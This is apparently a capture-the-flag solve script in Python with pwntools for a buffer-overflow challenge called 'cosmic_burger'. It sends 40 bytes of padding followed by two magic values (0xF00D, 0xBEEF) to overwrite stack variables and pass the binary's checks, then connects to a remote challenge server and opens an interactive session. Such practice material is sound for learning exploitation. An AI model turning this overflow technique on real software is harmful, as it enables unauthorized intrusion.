OffSec-CTF/BOF/06_cosmic_burger_joint/solve.py

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF("./cosmic_burger", checksec=False)

p = process(elf.path)
p = remote("offsec.m0lecon.it", 13529)
# Your exploit here
OFFSET = 40
#   mov    eax,DWORD PTR [rbp-0x4]
#   cmp    eax,0xbeef
#   jne    0x12f2 <vuln+196>
#   mov    eax,DWORD PTR [rbp-0x8]
#   cmp    eax,0xf00d
first = 0xBEEF
second = 0xF00D
payload = flat(
    b"A" * OFFSET,
    p32(second),
    p32(first),
)
p.send(payload)
p.interactive()